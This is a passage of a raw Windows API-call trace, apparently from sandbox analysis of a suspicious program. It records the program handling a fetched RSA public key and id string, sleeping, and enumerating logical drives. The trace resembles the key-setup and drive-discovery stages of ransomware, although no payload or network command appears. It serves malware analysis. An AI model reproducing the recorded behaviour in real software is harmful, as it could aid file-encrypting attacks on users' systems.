KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3351fc0 | out: hHeap=0x630000) returned 1 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x43e) returned 0x32cb738 [0076.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a778, cbMultiByte=-1, lpWideCharStr=0x32cb738, cchWideChar=543 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 543 [0076.256] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.257] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0076.257] lstrlenA (lpString="\",\"id\":\"") returned 8 [0076.257] lstrcpyA (in: lpString1=0xfd2ab78, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.257] lstrcpyA (in: lpString1=0xfd2a778, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.257] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.258] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332d00 [0076.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x854) returned 0x32ca798 [0076.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3332d00, cbMultiByte=-1, lpWideCharStr=0x32ca798, cchWideChar=1066 | out: lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 43 [0076.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x33415e0 [0076.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0076.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332d00 | out: hHeap=0x630000) returned 1 [0076.259] lstrcpyW (in: lpString1=0x521cf0, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33415e0 | out: hHeap=0x630000) returned 1 [0076.260] lstrlenA (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 42 [0076.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x56) returned 0x32e5e18 [0076.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a778, cbMultiByte=-1, lpWideCharStr=0x32e5e18, cchWideChar=43 | out: lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 43 [0076.260] lstrcpyW (in: lpString1=0x521cf0, lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.260] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0076.260] lstrlenW (lpString="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 40 [0076.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d29c0 | out: hHeap=0x630000) returned 1 Thread: id = 43 os_tid = 0x42c [0077.255] timeGetTime () returned 0x11596b4 [0077.255] GetLastError () returned 0x54f [0077.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x32cbb80 [0077.255] GetCurrentThreadId () returned 0x42c [0077.255] SetLastError (dwErrCode=0x54f) [0077.255] Sleep (dwMilliseconds=0x96258) [0092.732] Sleep (dwMilliseconds=0x3e8) [0093.740] GetLogicalDrives () returned 0x4 [0093.740] SetErrorMode (uMode=0x1) returned 0x0 [0093.740] PathFileExistsA (pszPath="C:\\") returned 1 [0093.741] SetErrorMode (uMode=0x0) returned 0x1 [0093.741] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0093.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x335e120 [0093.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9e2fe60, cbMultiByte=-1, lpWideCharStr=0x335e120, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0093.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x6567d8 [0093.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.742] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] 